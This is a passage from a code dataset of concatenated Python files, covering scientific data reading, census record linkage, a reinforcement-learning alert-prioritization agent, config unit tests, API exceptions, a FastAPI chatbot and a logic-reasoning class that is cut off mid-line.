tuple(index_tuple)\n\n\ndef get_data(series, record_component, i_slice=None, pos_slice=None,\n output_type=None):\n \"\"\"\n Extract the data from a (possibly constant) dataset\n Slice the data according to the parameters i_slice and pos_slice\n\n Parameters:\n -----------\n series: openpmd_api.Series\n An open, readable openPMD-api series object\n\n record_component: an openPMD.Record_Component\n\n pos_slice: int or list of int, optional\n Slice direction(s).\n When None, no slicing is performed\n\n i_slice: int or list of int, optional\n Indices of slices to be taken.\n\n output_type: a numpy type\n The type to which the returned array should be converted\n\n Returns:\n --------\n An np.ndarray (non-constant dataset) or a single double (constant dataset)\n \"\"\"\n # For back-compatibility: Convert pos_slice and i_slice to\n # single-element lists if they are not lists (e.g. float\n # and int respectively).\n if pos_slice is not None and not isinstance(pos_slice, list):\n pos_slice = [pos_slice]\n if i_slice is not None and not isinstance(i_slice, list):\n i_slice = [i_slice]\n\n # ADIOS2: Actual chunks, all other: one chunk\n chunks = record_component.available_chunks()\n\n # mask invalid regions with NaN: fill value\n # note: NaN is only defined for floating point types\n NaN_value = np.nan if np.issubdtype(record_component.dtype, np.floating) or np.issubdtype(record_component.dtype, np.complexfloating) else 0\n\n # read whole data set\n if pos_slice is None:\n # mask invalid regions with NaN\n # note: full_like triggers a full read, thus we avoid it #340\n data = np.full(record_component.shape, NaN_value, record_component.dtype)\n\n for chunk in chunks:\n chunk_slice = chunk_to_slice(chunk)\n\n # skip empty slices\n # https://github.com/ornladios/ADIOS2\n volume = 1\n for csl in chunk_slice:\n volume *= csl.stop - csl.start\n if volume == 0:\n continue\n\n # read only valid region\n x = record_component[chunk_slice]\n series.flush()\n data[chunk_slice] = x\n # slice: read only part of the data set\n else:\n full_shape = record_component.shape\n\n slice_shape = list(full_shape) # copy\n pos_slice_sorted = pos_slice.copy() # copy for in-place sort\n pos_slice_sorted.sort(reverse=True)\n for dir_index in pos_slice_sorted: # remove indices in list\n del slice_shape[dir_index]\n\n # mask invalid regions with NaN\n data = np.full(slice_shape, NaN_value, dtype=record_component.dtype)\n\n # build requested ND slice with respect to full data\n s = []\n for d in range(len(full_shape)):\n if d in pos_slice:\n s.append(i_slice[pos_slice.index(d)]) # one index in such directions\n else: # all indices in other direction\n s.append(slice(None, None, None))\n s = tuple(s)\n\n # now we check which chunks contribute to the slice\n for chunk in chunks:\n skip_this_chunk = False\n s_valid = list(s) # same as s but reduced to valid regions in chunk\n s_target = [] # starts and stops in sliced array\n chunk_slice = chunk_to_slice(chunk)\n\n # skip empty slices\n # https://github.com/ornladios/ADIOS2\n volume = 1\n for csl in chunk_slice:\n volume *= csl.stop - csl.start\n if volume == 0:\n continue\n\n # read only valid region\n for d, slice_d in enumerate(s):\n start = chunk_slice[d].start\n stop = chunk_slice[d].stop\n if isinstance(slice_d, int):\n # Nothing to do for s_target (dimension sliced out)\n # Nothing to do for s_valid (dimension index is set)\n if slice_d < start or slice_d >= stop:\n # chunk not in slice line/plane\n skip_this_chunk = True\n else:\n if slice_d.start is None or slice_d.start < start:\n s_valid[d] = slice(start, s_valid[d].stop)\n if slice_d.stop is None or slice_d.stop > stop:\n s_valid[d] = slice(s_valid[d].start, stop)\n s_target.append(slice(start, stop))\n\n s_valid = tuple(s_valid)\n s_target = tuple(s_target)\n\n # read\n if not skip_this_chunk:\n x = record_component[s_valid]\n series.flush()\n data[s_target] = x\n\n # Convert to the right type\n if (output_type is not None) and (data.dtype != output_type):\n data = data.astype( output_type )\n # Scale by the conversion factor\n if record_component.unit_SI != 1.0:\n if np.issubdtype(data.dtype, np.floating) or \\\n np.issubdtype(data.dtype, np.complexfloating):\n data *= record_component.unit_SI\n else:\n data = data * record_component.unit_SI\n\n return data\n\n\ndef join_infile_path(*paths):\n \"\"\"\n Join path components using '/' as separator.\n This method is defined as an alternative to os.path.join, which uses '\\\\'\n as separator in Windows environments and is therefore not valid to navigate\n within data files.\n\n Parameters:\n -----------\n *paths: all strings with path components to join\n\n Returns:\n --------\n A string with the complete path using '/' as separator.\n \"\"\"\n # Join path components\n path = '/'.join(paths)\n # Correct double slashes, if any is present\n path = path.replace('//', '/')\n\n return path\n","repo_name":"openPMD/openPMD-viewer","sub_path":"openpmd_viewer/openpmd_timeseries/data_reader/io_reader/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"72"} +{"seq_id":"20507695821","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport DWM10_Parms\ndef transitiveClosure(pairList):\n logFile = DWM10_Parms.logFile\n print('\\n>>Starting DWM80')\n print('\\n>>Starting DWM80', file=logFile)\n # Bootstap process by add reverse of all pairs to the pairList\n iterationCnt = 0\n clusterList = []\n for pair in pairList:\n clusterList.append(pair)\n pairRev = (pair[1],pair[0])\n clusterList.append(pairRev)\n pairSelf = (pair[0],pair[0])\n clusterList.append(pairSelf)\n pairList = []\n # Change 2.10\n pairList = list(set(clusterList))\n # Sort pairs in order by the first position (the key)\n pairList.sort()\n #print('***sorted pairList size =', len(pairList))\n #print('***sorted pairList =', pairList)\n # All of the pairs with same key are a Key Group\n clusterList = []\n moreWorkToDo = True\n iteration = 0\n while moreWorkToDo:\n moreWorkToDo = False\n iteration +=1\n # Add a caboose record to the end of the pairList\n caboose = ('---','---')\n pairList.append(caboose)\n keyGroup = []\n for j in range(0,len(pairList)-1):\n currentPair = pairList[j]\n keyGroup.append(currentPair)\n # Look ahead to the next key\n nextPair = pairList[j+1]\n currentKey = currentPair[0]\n nextKey = nextPair[0]\n # When next key is different, at end of Key Group and ready to process keyGroup\n if currentKey != nextKey:\n firstGroupPair = keyGroup[0]\n firstGroupPairKey = firstGroupPair[0]\n firstGroupPairValue = firstGroupPair[1]\n # Add new pairs to clusterList from key groups starting with reversed pair and larger than 1 pair\n keyGroupSize = len(keyGroup)\n if firstGroupPairKey > firstGroupPairValue:\n if keyGroupSize>1:\n moreWorkToDo = True\n for k in range(keyGroupSize):\n groupPair = keyGroup[k]\n groupPairValue = groupPair[1]\n newPair = (firstGroupPairValue, groupPairValue)\n clusterList.append(newPair)\n newReversePair = (groupPairValue, firstGroupPairValue)\n clusterList.append(newReversePair)\n # Decide if first pair of keyGroup should move over to clusterList\n lastGroupPair = keyGroup[keyGroupSize-1]\n lastGroupPairValue = lastGroupPair[1]\n if firstGroupPairKey < lastGroupPairValue:\n clusterList.append(firstGroupPair) \n else:\n # pass other key groups forward to cluster list\n clusterList.extend(keyGroup)\n keyGroup = []\n pairList = []\n # Change 2.10\n pairList = list(set(clusterList))\n pairList.sort()\n iterationCnt +=1\n clusterList = []\n print('Total Closure Iterations =',iterationCnt)\n print('Total Closure Iterations =',iterationCnt, file=logFile)\n print('Size of Cluster List =', len(pairList))\n return pairList\n\n","repo_name":"OnaisKhanMohammed/Census-Linking","sub_path":"DWM80_TransitiveClosure.py","file_name":"DWM80_TransitiveClosure.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30941651499","text":"#!/usr/bin/env python3\n\n\"\"\"Reinforcement-learning based best-response policies.\"\"\"\nimport logging\nfrom numpy import array, float32\nfrom random import Random\nfrom time import time\n\nfrom model import Model\nfrom test import test_model, test_attack_action\n\nfrom utils import ReplayBuffer\nfrom utils import ActorNetwork\nfrom utils import CriticNetwork\n\n\nimport itertools\nimport numpy as np \nimport tensorflow as tf\n\n\nBUFFER_SIZE = 10000\nBATCH_SIZE = 32\nGAMMA = 0.99\nTAU = 0.001 # target Network HyperParameters\nLRA = 0.01#0.0001 # learning rate for Actor\nLRC = 0.01#0.001 # lerning rate for Critic\n\nnp.random.seed(133)\nEXPLORE = 1000\nepisode_count = 2#2000 # number of episodes\nmax_steps = 1000#10000 # self.steps in each episode\nreward = 0\n\n#Tensorflow GPU optimization\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nfrom keras import backend as K\nK.set_session(sess)\n\ndef normalized(vect):\n \"\"\"\n Normalize the given vector.\n :param vect: Vector represented as a list of floats.\n :return: Normalized vector represented as a list of floats.\n \"\"\"\n factor = 1 / sum(vect)\n return [element * factor for element in vect]\n\nclass DDPGAgent:\n \"\"\"\n Learning algorithm inspired by Q-learning. \n States are represented as lists of arbitrary floats, while actions are represented as normalized lists of floats (i.e., floats are greater than or equal to zero and sum up to one).\n Differences compared to Q-learning are described in the documentation of the relevant functions.\n \"\"\"\n\n def __init__(self, state_size, action_size):\n \"\"\"\n Construct a learning algorithm object.\n :param state_size: Length of lists representing states.\n :param action_size: Length of lists representing actions.\n \"\"\"\n self.state_size = state_size\n self.action_size = action_size\n self.actor = ActorNetwork(sess, self.state_size, self.action_size, BATCH_SIZE, TAU, LRA)\n self.critic = CriticNetwork(sess, self.state_size, self.action_size, BATCH_SIZE, TAU, LRC)\n self.buff = ReplayBuffer(BUFFER_SIZE) \n self.step = 0\n self.epsilon = 1\n \n def learn(self, initial_state, state_observe, state_update, rnd=Random(0)):\n \"\"\"\n Q-learning based algorithm for learning the best actions in every state.\n Note that due to performance reasons, the state-value function (i.e., Q) is not updated after every self.step, but only in batches.\n :param initial_state: Initial state, represented as an arbitrary object (note that this can be of a different format than the states used in other functions of QLearning).\n :param state_observe: Observes the state. Function, takes either initial_state or a state output by state_update, returns a list of floats (of length state_size).\n :param state_update: Updates the state based on an action. Function, takes a state (see state_observe) and an action (normalized list of floats), return the next state (may be arbitrary object).\n :param rnd: Random number generator.\n \"\"\"\n logging.info(\"DDPG algorithm starts.\")\n for i in range(episode_count):\n logging.info(\"Episode: %s Replay Buffer: %s\", str(i), str(self.buff.count()))\n state_t = initial_state \n s_t = np.array([state_observe(initial_state)]) # initial observation state\n total_reward = 0.\n\n for j in range(max_steps):\n loss = 0 \n self.epsilon -= 1.0 / EXPLORE \n a_t = np.zeros([1, self.action_size])\n noise_t = np.zeros([1, self.action_size]) # a noise process to select action\n \n # selct action according to the current policy and exploration noise\n a_t_original = self.actor.model.predict(s_t)\n for k in range(self.action_size):\n noise_t[0][k] = max(self.epsilon, 0)*np.random.normal(0, 0.1, 1)[0] # the noise follows Gaussian distribution\n a_t[0][k] = a_t_original[0][k]+noise_t[0][k]\n if a_t[0][k] < 0:\n a_t[0][k] = 0.05 # before normalization, we should make sure a_t[0][k] >= 0\n # normalize the action\n sum_action = sum(a_t[0])\n for k in range(self.action_size):\n a_t[0][k] = a_t[0][k]*1.0/sum_action \n #print(j, a_t[0])\n (state_t1, loss_t) = state_update(state_t, list(a_t[0]))\n r_t = -1*loss_t # reward of the defender is -1*its loss \n s_t1 = np.array([state_observe(state_t1)])\n\n self.buff.add(s_t[0], a_t[0], r_t, s_t1[0]) # add replay buffer\n\n #Do the batch update\n batch = self.buff.getBatch(BATCH_SIZE)\n states = np.asarray([e[0] for e in batch])\n actions = np.asarray([e[1] for e in batch])\n rewards = np.asarray([e[2] for e in batch])\n new_states = np.asarray([e[3] for e in batch])\n y_t = np.asarray([[0] for e in batch])\n\n\n\n target_q_values = self.critic.target_model.predict([new_states, self.actor.target_model.predict(new_states)]) \n\n for k in range(len(batch)):\n y_t[k] = rewards[k] + GAMMA*target_q_values[k]\n\n loss += self.critic.model.train_on_batch([states,actions], y_t) \n a_for_grad = self.actor.model.predict(states)\n grads = self.critic.gradients(states, a_for_grad)\n self.actor.train(states, grads)\n self.actor.target_train()\n self.critic.target_train()\n\n total_reward += r_t\n s_t = s_t1\n state_t = state_t1\n\n self.step += 1\n\n logging.info(\"TOTAL REWARD @ %s-th Episode : Reward %s\", str(i), str(total_reward))\n logging.info(\"Total self.step: %s\", str(self.step))\n logging.info(\"\")\n\n logging.info(\"Finish.\")\n\ndef flatten_lists(lists):\n \"\"\"\n Construct a single list from a list of lists.\n :param lists: List of lists.\n :return: Single list that contains all the elements of all the lists, in the same order.\n \"\"\" \n return [element for inner in lists for element in inner]\n \ndef unflatten_list(lst, dim):\n \"\"\"\n Construct a list of lists from a single list.\n :param lst: List of elements, size must be a multiple of dim.\n :param dim: Number of elements in each inner list.\n :return: List of lists that contain all the elements of the list.\n \"\"\"\n ##print(len(lst))\n ##print(dim)\n assert((len(lst) % dim) == 0)\n lists = []\n for i in range(len(lst) // dim):\n lists.append([lst[j] for j in range(i * dim, (i + 1) * dim)])\n return lists\n \nclass DefenderBestResponse:\n \"\"\"Best-response investigation policy for the defender.\"\"\"\n def __init__(self, model, alpha):\n \"\"\"\n Construct a best-response object using QLearning.\n :param model: Model of the alert prioritization problem (i.e., Model object).\n :param alpha: Attack policy. Function, takes a model and a state, returns the probability of mounting attacks (one-dimensional list) given a model and a state.\n \"\"\"\n agent = DDPGAgent(len(model.alert_types) * model.horizon, len(model.alert_types) * model.horizon)\n def state_update(state, action):\n \"\"\"\n State update function for QLearning.learn.\n :param state: State of the alert prioritization problem (i.e., Model.State object).\n :param action: Action represented as a normalized list of floats.\n :return: Next state (i.e., Model.State object).\n \"\"\"\n delta = model.make_investigation_feasible(state.N, unflatten_list(action, len(model.alert_types))) # make_investigation_feasible ``unnormalizes'' the action\n next_state = model.next_state(state, delta, alpha)\n loss = next_state.U - state.U\n return (next_state, loss)\n agent.learn(Model.State(model),\n lambda state: flatten_lists(state.N),\n state_update)\n \nif __name__ == \"__main__\":\n logging.basicConfig(format='%(asctime)s / %(levelname)s: %(message)s', level=logging.DEBUG)\n model = test_model()\n DefenderBestResponse(model, test_attack_action)\n","repo_name":"aronlaszka/AlertPrioritization","sub_path":"code/v1/src/learning_AC.py","file_name":"learning_AC.py","file_ext":"py","file_size_in_byte":8496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43286002499","text":"\"\"\"\nTest the stackify.application module\n\"\"\"\n\nimport unittest\nimport os\nfrom mock import patch\nfrom tests.bases import ClearEnvTest\n\nfrom stackify.constants import API_URL\nfrom stackify.constants import DEFAULT_HTTP_ENDPOINT\nfrom stackify.constants import TRANSPORT_TYPE_AGENT_HTTP\nfrom stackify.constants import TRANSPORT_TYPE_AGENT_SOCKET\nfrom stackify.constants import TRANSPORT_TYPE_DEFAULT\nfrom stackify.transport.application import get_configuration\n\n\nclass TestConfig(ClearEnvTest):\n '''\n Test automatic configuration for the ApiConfiguration\n '''\n\n def test_required_kwargs(self):\n '''API configuration requires appname, env and key'''\n env_map = {}\n\n with patch.dict('os.environ', env_map):\n with self.assertRaises(NameError):\n get_configuration()\n with self.assertRaises(NameError):\n get_configuration(application='1')\n with self.assertRaises(NameError):\n get_configuration(application='1', environment='2')\n with self.assertRaises(NameError):\n get_configuration(application='1', environment='2', api_url='3')\n\n get_configuration(application='1', environment='2', api_key='3')\n\n def test_environment_config(self):\n '''API configuration can load from env vars'''\n env_map = {\n 'STACKIFY_APPLICATION': 'test1_appname',\n 'STACKIFY_ENVIRONMENT': 'test1_environment',\n 'STACKIFY_API_KEY': 'test1_apikey',\n 'STACKIFY_API_URL': 'test1_apiurl',\n }\n\n with patch.dict('os.environ', env_map):\n config = get_configuration()\n\n self.assertEqual(config.application, 'test1_appname')\n self.assertEqual(config.environment, 'test1_environment')\n self.assertEqual(config.api_key, 'test1_apikey')\n self.assertEqual(config.api_url, 'test1_apiurl')\n\n def test_kwarg_mix(self):\n '''API configuration can load from a mix of env vars and kwargs'''\n env_map = {\n 'STACKIFY_APPLICATION': 'test2_appname',\n 'STACKIFY_ENVIRONMENT': 'test2_environment',\n }\n\n with patch.dict('os.environ', env_map):\n config = get_configuration(api_key='test2_apikey', api_url='test2_apiurl')\n\n self.assertEqual(config.application, 'test2_appname')\n self.assertEqual(config.environment, 'test2_environment')\n self.assertEqual(config.api_key, 'test2_apikey')\n self.assertEqual(config.api_url, 'test2_apiurl')\n\n def test_kwargs(self):\n '''API configuration can load from kwargs'''\n config = get_configuration(\n application='test3_appname',\n environment='test3_environment',\n api_key='test3_apikey',\n api_url='test3_apiurl',\n )\n\n self.assertEqual(config.application, 'test3_appname')\n self.assertEqual(config.environment, 'test3_environment')\n self.assertEqual(config.api_key, 'test3_apikey')\n self.assertEqual(config.api_url, 'test3_apiurl')\n\n def test_api_url_default(self):\n '''API URL is set automatically'''\n config = get_configuration(\n application='test4_appname',\n environment='test4_environment',\n api_key='test4_apikey',\n )\n\n self.assertEqual(config.application, 'test4_appname')\n self.assertEqual(config.environment, 'test4_environment')\n self.assertEqual(config.api_key, 'test4_apikey')\n self.assertEqual(config.api_url, API_URL)\n\n def test_transport_default(self):\n config = get_configuration(\n application='test4_appname',\n environment='test4_environment',\n api_key='test4_apikey',\n api_url='test3_apiurl',\n )\n\n self.assertEqual(config.application, 'test4_appname')\n self.assertEqual(config.environment, 'test4_environment')\n self.assertEqual(config.api_key, 'test4_apikey')\n self.assertEqual(config.api_url, 'test3_apiurl')\n self.assertEqual(config.transport, 'default')\n\n def test_transport_given(self):\n config = get_configuration(\n application='test5_appname',\n environment='test5_environment',\n api_key='test5_apikey',\n api_url='test5_apiurl',\n transport='test5_transport'\n )\n\n self.assertEqual(config.application, 'test5_appname')\n self.assertEqual(config.environment, 'test5_environment')\n self.assertEqual(config.api_key, 'test5_apikey')\n self.assertEqual(config.api_url, 'test5_apiurl')\n self.assertEqual(config.transport, 'test5_transport')\n\n def test_api_key_is_required_on_default_transport(self):\n with self.assertRaises(NameError):\n get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='',\n api_url='test_apiurl',\n transport='default'\n )\n\n def test_api_key_is_not_required_on_agent_socket_transport(self):\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='',\n api_url='test_apiurl',\n transport='agent_socket'\n )\n\n self.assertEqual(config.application, 'test_appname')\n self.assertEqual(config.environment, 'test_environment')\n self.assertEqual(config.api_key, '')\n self.assertEqual(config.api_url, 'test_apiurl')\n self.assertEqual(config.transport, 'agent_socket')\n\n\nclass ConfigEnvironmentVariableTest(ClearEnvTest):\n def test_transport_environment_variable_default(self):\n os.environ[\"STACKIFY_TRANSPORT\"] = \"default\"\n\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.transport == TRANSPORT_TYPE_DEFAULT\n\n del os.environ[\"STACKIFY_TRANSPORT\"]\n\n def test_transport_environment_variable_agent_socket(self):\n os.environ[\"STACKIFY_TRANSPORT\"] = \"agent_socket\"\n\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.transport == TRANSPORT_TYPE_AGENT_SOCKET\n\n del os.environ[\"STACKIFY_TRANSPORT\"]\n\n def test_transport_environment_variable_agent_http(self):\n os.environ[\"STACKIFY_TRANSPORT\"] = \"agent_http\"\n\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.transport == TRANSPORT_TYPE_AGENT_HTTP\n\n del os.environ[\"STACKIFY_TRANSPORT\"]\n\n def test_http_endpoint_environment_variable_default(self):\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.http_endpoint == DEFAULT_HTTP_ENDPOINT\n\n def test_http_endpoint_environment_variable(self):\n os.environ[\"STACKIFY_TRANSPORT_HTTP_ENDPOINT\"] = \"test\"\n\n config = get_configuration(\n application='test_appname',\n environment='test_environment',\n api_key='test_apikey',\n api_url='test_apiurl',\n )\n\n assert config.http_endpoint == \"test\"\n\n del os.environ[\"STACKIFY_TRANSPORT_HTTP_ENDPOINT\"]\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"stackify/stackify-api-python","sub_path":"tests/transport/test_application.py","file_name":"test_application.py","file_ext":"py","file_size_in_byte":7727,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34636732516","text":"\"\"\"\nDescriptive exception classes for the AIrsenal API\n\"\"\"\n\n\nclass ApiException(Exception):\n status_code = 500\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv[\"status\"] = \"error\"\n rv[\"error\"] = self.message\n return rv\n","repo_name":"alan-turing-institute/AIrsenal","sub_path":"airsenal/api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":243,"dataset":"github-code","pt":"72"} +{"seq_id":"39381922109","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom ans import Ans_frm\nfrom fastapi.middleware.cors import CORSMiddleware\nimport webbrowser\nimport uvicorn\napp = FastAPI(docs_url='/demo/docs', redoc_url='/demo/redocs',openapi_url='/demo/openapi.json')\norigins = [\"*\"]\napp.add_middleware(\nCORSMiddleware,\n # allow_origins=origins,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\nclass QuestionInput(BaseModel):\n question: str\n\n\nqna_testing = Ans_frm()\n\n@app.post(\"/demo/predict\")\nasync def predict(question_input: QuestionInput):\n try:\n question = question_input.question\n print(question)\n out=qna_testing.similarity_search_content(question)\n out1=qna_testing.similarity_search_link(question)\n valid1=out[0][-1] \n if (valid1<0.3):\n out=str(out)\n print(out)\n out1=dict(out1[0][0])\n\n link=qna_testing.link_gen(out1[\"page_content\"])\n answer=qna_testing.extract_answer(out)\n result = {\"answer\": answer,\"link\":link}\n else:\n result=None \n print(result)\n return result\n except Exception as e:\n return {\"error\": str(e)}\nif __name__ == \"__main__\":\n url = \"/home/arnav/college_chatbot/src/chartgpt/chat.html\"\n webbrowser.get('google-chrome').open(url)\n\n uvicorn.run(app, port=8000) \n","repo_name":"Arni-tech/college_chatbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35903687457","text":"from typing import Tuple, Mapping, FrozenSet, Set, Collection, MutableMapping, Type, Sequence, Optional\n\nfrom frozendict import frozendict # type: ignore\nfrom pydantic import Field\nfrom pydantic.dataclasses import dataclass\n\nfrom scpy.action.action import Action\nfrom scpy.agent.agent import Agent\nfrom scpy.causal_setting.causal_setting import CausalSetting\nfrom scpy.dataclass_config import DataclassConfig\nfrom scpy.preorder import Preorder\nfrom scpy.primitives import Function, Literal, Predicate\nfrom scpy.situation.situation import Situation\nfrom scpy.state.state import State\nfrom scpy.util import from_function_to_predicate\n\n\n@dataclass(frozen=True, order=True, config=DataclassConfig)\nclass DialecticCausalSetting(CausalSetting):\n fact_set: State = Field(default_factory=frozenset)\n awareness_set: FrozenSet[Predicate] = Field(default_factory=frozenset)\n argument_scheme: Mapping[Function, Tuple[FrozenSet[Literal], FrozenSet[Literal]]] = Field(\n default_factory=frozendict)\n conflict_relation: Preorder = Field(default_factory=Preorder)\n strength_preorder: Preorder = Field(default_factory=Preorder)\n fluents: FrozenSet[Predicate] = Field(init=False, repr=False, default_factory=frozenset)\n actions: FrozenSet[Action] = Field(init=False, repr=False, default_factory=frozenset)\n agents: FrozenSet[Agent] = Field(default_factory=frozenset)\n\n def __post_init__(self) -> None:\n actions: Set[Action] = set()\n if isinstance(self.awareness_set, frozenset):\n for pred in self.awareness_set:\n arg = Literal(pred)\n actions.add(Function('position', (arg,)))\n actions.add(Function('position', (-arg,)))\n if isinstance(self.argument_scheme, Mapping):\n for arg, cogn_ctx in self.argument_scheme.items(): # type: ignore[assignment]\n preds, poses = cogn_ctx\n for pos in poses:\n actions.add(Function('supports', (arg, pos)))\n\n object.__setattr__(self, 'actions', frozenset(actions))\n\n def __extract_argument_position(self, action: Action, symbol: str = 'supports') -> \\\n Tuple[Function, Literal]:\n if action.symbol != symbol:\n raise ValueError(\n f\"Unknown Action {action}. Action.symbol is {action.symbol} but should be {symbol}\")\n if len(action.arguments) < 2:\n raise ValueError(\n f\"Unknown Action {action}. Not enough arguments.\")\n arg = action.arguments[0]\n pos = action.arguments[1]\n if not isinstance(arg, Function):\n raise ValueError(\n f\"Unknown Action {action}. {arg} must be of type Function, but is type {type(arg).__name__}.\")\n if not isinstance(pos, Literal):\n raise ValueError(\n f\"Unknown Action {action}. {pos} must be of type Literal, but is type {type(pos).__name__}.\")\n if arg not in self.argument_scheme:\n raise ValueError(f\"Unknown Action {action}. Argument not in argument scheme.\")\n if pos.predicate not in self.awareness_set:\n raise ValueError(f\"Unknown Action {action}. Position not in awareness set.\")\n e = arg.arguments[0]\n if isinstance(e, Literal):\n if e.predicate not in self.awareness_set:\n raise ValueError(f\"Unknown Action {action}. {e.predicate} not in awareness set.\")\n else:\n assert isinstance(e, Function)\n if len(e.arguments) != 2:\n raise ValueError(f\"Unknown Action {action}. {e} should have exactly two arguments.\")\n c = e.arguments[0]\n if not isinstance(c, Literal):\n raise ValueError(\n f\"Unknown Action {action}. {c} must be of type Literal, but is type {type(c).__name__}.\")\n if c.predicate not in self.awareness_set:\n raise ValueError(\n f\"Unknown Action {action}. {c.predicate} not in awareness set.\"\n )\n p = e.arguments[1]\n if isinstance(p, Literal):\n if p.predicate not in self.awareness_set:\n raise ValueError(\n f\"Unknown Action {action}. {p.predicate} not in awareness set.\"\n )\n elif isinstance(p, Function):\n if p.symbol != 'exo':\n raise ValueError(\n f\"Unknown Action {action}. {p} must have the symbol exo.\")\n\n return arg, pos\n\n def __is_well_formed(self, literal: Literal, functor: str, *types: Type) -> bool:\n if literal.predicate.functor != functor:\n return False\n types_: Sequence[Type] = tuple(types)\n if len(types_) < len(literal.predicate.arguments):\n return False\n for i, arg in enumerate(literal.predicate.arguments):\n type_: Type = types_[i]\n # noinspection PyTypeHints\n if not isinstance(arg, type_):\n return False\n if type_ is Literal:\n assert isinstance(arg, Literal)\n if arg.predicate not in self.awareness_set:\n return False\n return True\n\n def __do_initial_state(self, action: Action) -> State:\n if action.symbol != 'position':\n raise ValueError(\n f\"Unknown Action {action}. In initial state Action has to be of form \"\n f\"{Function('position', (Function('Position'),))}.\")\n pos = action.arguments[0]\n if not isinstance(pos, Literal):\n raise ValueError(f\"Unknown Action {action}. Position has to be a Literal\")\n if pos.predicate not in self.awareness_set:\n raise ValueError(f\"Unknown Action {action}. {pos.predicate} is not in the awareness set.\")\n argument_lit = Literal(Predicate('position', (pos,)))\n return frozenset({argument_lit})\n\n def __do_reasoning(self, action: Action, state: State, incomplete: Mapping[Literal, Collection[Literal]],\n functor: str = 'argument') -> State:\n arg, pos = self.__extract_argument_position(action)\n if not (pos in incomplete and not incomplete[pos]) and not any(\n pos in preds for _, preds in incomplete.items()):\n raise ValueError(f\"Unknown Action {action}. Position does not need support.\")\n state_ = set(state)\n argument_pred = Predicate(functor, (arg, pos))\n argument_lit = Literal(argument_pred)\n if -argument_lit in state_:\n state_.remove(-argument_lit)\n state_.add(argument_lit)\n return frozenset(state_)\n\n def __do_attack(self, action: Action, state: State, attack_map: Mapping[Function, Collection[Literal]]) -> State:\n arg, pos = self.__extract_argument_position(action, 'attacks')\n if arg not in attack_map:\n raise ValueError(f\"Unknown action {action}. Does not attack argument.\")\n\n attack_pred = from_function_to_predicate(action)\n attack_lit = Literal(attack_pred)\n state_ = set(state)\n if -attack_lit in state:\n state_.remove(-attack_lit)\n state_.add(attack_lit)\n return frozenset(state_)\n\n def __do_defense(self, action: Action, state: State,\n undefended_attacks: Mapping[Function, Collection[Literal]]) -> State:\n def_argument, def_position = self.__extract_argument_position(action, 'defends')\n if all(self.strength_preorder.is_strictly_preceded(def_argument, att_argument) for att_argument in\n undefended_attacks):\n raise ValueError(f\"Unknown Action {action}. Defense is not stronger than attack.\")\n state_ = set(state)\n def_argument_pred = from_function_to_predicate(action)\n def_argument_lit = Literal(def_argument_pred)\n if -def_argument_lit in state_:\n state_.remove(-def_argument_lit)\n state_.add(def_argument_lit)\n return frozenset(state_)\n\n def __do_consolidate(self, state: State) -> State:\n att: Optional[Literal] = None\n attacking = set()\n defending = set()\n for literal in state:\n if self.__is_well_formed(literal, 'attacks', Function, Literal):\n functor = literal.predicate.functor\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n lit = Literal(Predicate(functor, (arg, -pos)))\n attacking.add(lit)\n att = literal\n elif self.__is_well_formed(literal, 'defends', Function, Literal):\n defending.add(literal)\n changed = True\n while changed:\n changed = False\n for literal in state:\n if self.__is_well_formed(literal, 'supports', Function, Literal):\n arg, pos = literal.predicate.arguments\n assert isinstance(arg, Function)\n assert isinstance(pos, Literal)\n for coll in (attacking, defending):\n if literal in coll:\n continue\n for elem in coll:\n arg, _ = elem.predicate.arguments\n assert isinstance(arg, Function)\n preds, _ = self.argument_scheme[arg]\n if pos in preds:\n changed = True\n coll.add(literal)\n break\n\n state_ = set(state)\n for attack in attacking:\n counterargument = Literal(Predicate('counterargument', attack.predicate.arguments))\n if -counterargument in state_:\n state_.remove(-counterargument)\n state_.add(counterargument)\n\n for defence in defending:\n arg = Literal(Predicate('argument', defence.predicate.arguments))\n if -arg in state_:\n state_.remove(-arg)\n state_.add(arg)\n state_ -= (attacking | defending)\n assert not attacking or att is not None\n if att is not None:\n state_.remove(att)\n return frozenset(state_)\n\n def unsupported_literals(self, state: State, argument: Function) -> Collection[Literal]:\n preds, poses = self.argument_scheme[argument]\n supported = set()\n for literal in state:\n if self.__is_well_formed(literal, 'supports', Function, Literal):\n arg, pos = literal.predicate.arguments\n supported.add(pos)\n return {pred for pred in preds if pred not in supported}\n\n def attacks(self, state: State) -> Mapping[Function, Collection[Literal]]:\n arguments = set()\n counterarguments 